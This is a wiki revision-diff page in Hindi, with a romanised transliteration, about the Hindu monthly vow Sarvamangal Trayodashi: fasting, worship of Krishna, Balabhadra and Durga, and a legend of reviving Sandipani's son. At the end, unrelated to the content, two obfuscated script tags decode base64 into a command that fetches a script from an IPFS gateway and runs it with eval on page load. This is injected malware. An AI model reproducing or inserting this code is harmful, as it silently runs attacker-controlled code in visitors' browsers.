Difference between revisions of "सर्वमंगल त्रियोदशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[प्रतिमास]] [[शुक्ल पक्ष]] की [[त्रियोदशी]] पर एकभक्त या नक्त या उपवास करना चाहिए।
 
*[[प्रतिमास]] [[शुक्ल पक्ष]] की [[त्रियोदशी]] पर एकभक्त या नक्त या उपवास करना चाहिए।
*[[कृष्ण]], [[बलभद्र]] एवं [[मंगला]] ([[दुर्गा]]) देवी<ref>(जिसे अंकावंका कहा जाता है)</ref> की पूजा करनी चाहिए।
+
*[[कृष्ण]], [[बलभद्र]] एवं [[मंगला]] ([[दुर्गा]]) देवी<ref>जिसे अंकावंका कहा जाता है</ref> की पूजा करनी चाहिए।
*इन तीनों के स्मरण या इन तीनों की प्रतिमाओं की [[पूजा]] एवं [[पुष्प]], [[मांस]] एवं [[मदिरा]] अर्पण से सभी कठिनाइयों पर विजय प्राप्त की जाती है।<ref>हेमाद्रि (व्रत खण्ड 2, 16-17, भविष्योत्तरपुराण से उद्धरण)</ref>
+
*इन तीनों के स्मरण या इन तीनों की प्रतिमाओं की [[पूजा]] एवं [[पुष्प]], [[मांस]] एवं [[मदिरा]] अर्पण से सभी कठिनाइयों पर विजय प्राप्त की जाती है।<ref>हेमाद्रि (व्रत खण्ड 2, 16-17, भविष्योत्तरपुराण से उद्धरण</ref>
 
*कृष्ण ने [[युधिष्ठर]] से कहा था कि उनके गुरु [[सान्दीपनि]] ने जब दक्षिणा के रूप में उनसे अपने मृत पुत्र को जीवित कर देने को कहा तो उन्होंने (कृष्ण ने) देवी का स्मरण किया और मृत पुत्र पुनर्जीवित कर दिया।
 
*कृष्ण ने [[युधिष्ठर]] से कहा था कि उनके गुरु [[सान्दीपनि]] ने जब दक्षिणा के रूप में उनसे अपने मृत पुत्र को जीवित कर देने को कहा तो उन्होंने (कृष्ण ने) देवी का स्मरण किया और मृत पुत्र पुनर्जीवित कर दिया।
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:47, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • pratimas shukl paksh ki triyodashi par ekabhakt ya nakt ya upavas karana chahie.
  • krishna, balabhadr evan mangala (durga) devi[1] ki pooja karani chahie.
  • in tinoan ke smaran ya in tinoan ki pratimaoan ki pooja evan pushp, maans evan madira arpan se sabhi kathinaiyoan par vijay prapt ki jati hai.[2]
  • krishna ne yudhishthar se kaha tha ki unake guru sandipani ne jab dakshina ke roop mean unase apane mrit putr ko jivit kar dene ko kaha to unhoanne (krishna ne) devi ka smaran kiya aur mrit putr punarjivit kar diya.

tika tippani aur sandarbh

  1. jise aankavanka kaha jata hai
  2. hemadri (vrat khand 2, 16-17, bhavishyottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>